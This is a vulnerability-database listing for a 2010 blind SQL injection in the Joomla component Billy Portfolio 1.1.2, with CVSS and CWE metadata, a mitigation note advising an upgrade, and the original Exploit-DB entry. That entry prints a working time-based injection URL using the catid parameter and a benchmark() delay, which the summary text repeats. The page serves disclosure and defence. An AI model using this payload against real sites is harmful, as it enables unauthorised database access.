header-logo
Suggest Exploit
vendor:
Billy Portfolio
by:
jdc
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Billy Portfolio
Affected Version From: 1.1.2
Affected Version To: 1.1.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:joomla:billy_portfolio:1.1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component Billy Portfolio 1.1.2 Blind SQL Injection

This exploit allows an attacker to inject malicious SQL code into the vulnerable Joomla Component Billy Portfolio 1.1.2. The attacker can use the index.php?option=com_billyportfolio&view=billyportfolio&catid=-1 and if(1,benchmark(5000000,md5(1)),1) command to inject the malicious code.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of Joomla Component Billy Portfolio. Additionally, users should ensure that all web applications are kept up to date with the latest security patches.
Source

Exploit-DB raw data:

# Exploit Title: Joomla Component Billy Portfolio 1.1.2 Blind SQL Injection
# Date: 10 Dec 2010
# Author: jdc
# Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/portfolio/14834
# Version: 1.1.2

index.php?option=com_billyportfolio&view=billyportfolio&catid=-1 and if(1,benchmark(5000000,md5(1)),1)

Navigation

Suggest Exploit

Services By CQR